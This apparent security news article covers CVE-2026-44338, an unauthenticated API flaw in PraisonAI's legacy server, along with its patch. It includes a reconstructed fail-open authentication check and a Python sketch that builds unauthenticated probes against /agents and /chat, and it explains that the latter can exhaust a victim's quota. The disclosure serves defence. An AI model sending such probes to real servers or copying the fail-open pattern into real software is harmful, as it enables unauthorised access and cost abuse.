PraisonAI Vulnerability Exploited Hours After Public Disclosure
Artificial intelligence frameworks are rapidly integrating into core enterprise operations. However, a critical vulnerability within a popular AI platform has exposed organizations to significant security risks from threat actors.
Within hours of its public disclosure, a severe vulnerability in PraisonAI’s legacy API server, tracked as CVE-2026-44338, was already sending shockwaves through the developer community.
By shipping with authentication disabled by default, the framework essentially hands over the keys to its internal workflows.
This architectural misstep allows anyone on the network to hijack automated agent operations, execute tasks, and drain expensive API quotas without ever presenting a valid credential.
PraisonAI Vulnerability Exploit
The root cause of this high-severity flaw lies deep within the shipped legacy Flask API server, specifically targeting the src/praisonai/api_server.py entrypoint.
Security researchers discovered that the codebase relies on hard-coded insecure defaults, explicitly setting AUTH_ENABLED = False and AUTH_TOKEN = None.
Because the underlying check_auth() function fails open by design when authentication is disabled, any incoming request automatically bypasses the standard security gates.
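The fail-open pattern the advisory describes can be sketched as follows. This is an illustrative reconstruction, not PraisonAI’s actual source; only the names `AUTH_ENABLED`, `AUTH_TOKEN`, and `check_auth()` come from the advisory, and the token-comparison logic is an assumption about how such a check is typically written.

```python
# Illustrative reconstruction of the fail-open defaults reported for
# src/praisonai/api_server.py -- not the project's exact code.
AUTH_ENABLED = False   # insecure shipped default
AUTH_TOKEN = None      # no token configured

def check_auth(authorization_header):
    """Fail-open: when auth is disabled, every request passes."""
    if not AUTH_ENABLED:
        return True  # <-- the flaw: no credential is ever required
    return (
        authorization_header is not None
        and authorization_header == f"Bearer {AUTH_TOKEN}"
    )

# With the shipped defaults, even a request carrying no header is accepted:
print(check_auth(None))  # True
```

Because the `if not AUTH_ENABLED` branch runs before any token comparison, the shipped defaults make the credential check unreachable for every request.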
Compounding the risk, when this script is launched directly, it binds to 0.0.0.0:8080.
This exposes the vulnerable, unprotected endpoints to all reachable network interfaces rather than isolating them to local environments.
The framework’s deployment subsystem also mirrors this insecure setup, generating sample deployment configurations that recommend open host bindings alongside disabled authentication.
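Defenders can quickly verify whether the legacy port is reachable beyond loopback with a one-function TCP check. This is a generic sketch; the LAN address shown is a hypothetical placeholder, not a value from the advisory.

```python
# Quick exposure check: is the legacy API port reachable on a given interface?
import socket

def port_open(host, port, timeout=1.0):
    """Return True if a TCP connection to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

# If this prints True for a LAN address, the server is bound beyond loopback
# and the unauthenticated endpoints are network-exposed.
print(port_open("192.0.2.10", 8080))  # hypothetical LAN address
```

A `True` result for any non-loopback address means the 0.0.0.0 binding described above is in effect and should be treated as an open door until the service is patched or re-bound.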
Threat actors can exploit this oversight by targeting two primary endpoints, neither of which requires an Authorization header.
A simple GET request to the /agents route allows unauthenticated enumeration of the configured agent metadata, giving attackers immediate visibility into the system’s operational scope.
More critically, sending a POST request to /chat instantly triggers the system’s local agents.yaml workflow.
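The two probes described above can be sketched with the standard library alone. The target address and the `/chat` payload shape are assumptions for illustration; the advisory confirms only the paths, methods, and the absence of any required Authorization header.

```python
# Hedged sketch of the unauthenticated probes the advisory describes:
# GET /agents enumerates agent metadata; POST /chat triggers the victim's
# pre-configured agents.yaml workflow. BASE and the JSON body are assumed.
import json
import urllib.request

BASE = "http://victim-host:8080"  # assumed exposed 0.0.0.0:8080 binding

def build_probe(path, payload=None):
    """Build a request carrying NO Authorization header -- none is needed."""
    if payload is None:
        return urllib.request.Request(f"{BASE}{path}", method="GET")
    body = json.dumps(payload).encode()
    return urllib.request.Request(
        f"{BASE}{path}",
        data=body,
        headers={"Content-Type": "application/json"},
        method="POST",
    )

list_agents = build_probe("/agents")                       # enumerate agents
run_workflow = build_probe("/chat", {"message": "hello"})  # assumed body shape
# urllib.request.urlopen(run_workflow) would execute the victim's workflow
# and bill their upstream model quota -- constructed here but not sent.
```

Note that neither request carries credentials of any kind; against the shipped defaults, both would be accepted as-is.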
According to GitHub advisory GHSA-6rmh-7xcm-cpxj, the flaw allows external attackers to repeatedly trigger pre-configured automated workflows, even though it does not enable direct prompt injection.
Attackers can harvest sensitive output data returned by the system and, through repeated execution, force the victim’s infrastructure to exhaust costly external AI model quotas.
PraisonAI maintainers have released version 4.6.34 to patch this vulnerability. Developers utilizing the pip package must update their environments immediately to prevent active exploitation.
Furthermore, security engineers are strongly advised to transition away from the legacy API server and utilize the newer serve agents command.
This modern deployment path is secure by default, binding locally to 127.0.0.1 and requiring an --api-key argument for access, which effectively neutralizes the threat of unauthenticated intrusion.
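For contrast with the vulnerable default, a fail-closed version of the same check can be sketched as below. This mirrors the pattern the patched deployment path implies (a token is always required); it is illustrative, not PraisonAI’s code.

```python
# Fail-closed counterpart to the vulnerable check, sketched for contrast.
import secrets

AUTH_TOKEN = secrets.token_urlsafe(32)  # always set; never None

def check_auth(authorization_header):
    """Fail closed: requests without the exact bearer token are rejected."""
    if authorization_header is None:
        return False
    return secrets.compare_digest(authorization_header, f"Bearer {AUTH_TOKEN}")

print(check_auth(None))                    # False: no header, no access
print(check_auth(f"Bearer {AUTH_TOKEN}"))  # True: valid credential only
```

The key differences from the flawed original are that the token can never be absent and that the "deny" branch, not the "allow" branch, is the default; `secrets.compare_digest` additionally avoids timing side channels in the comparison.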
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.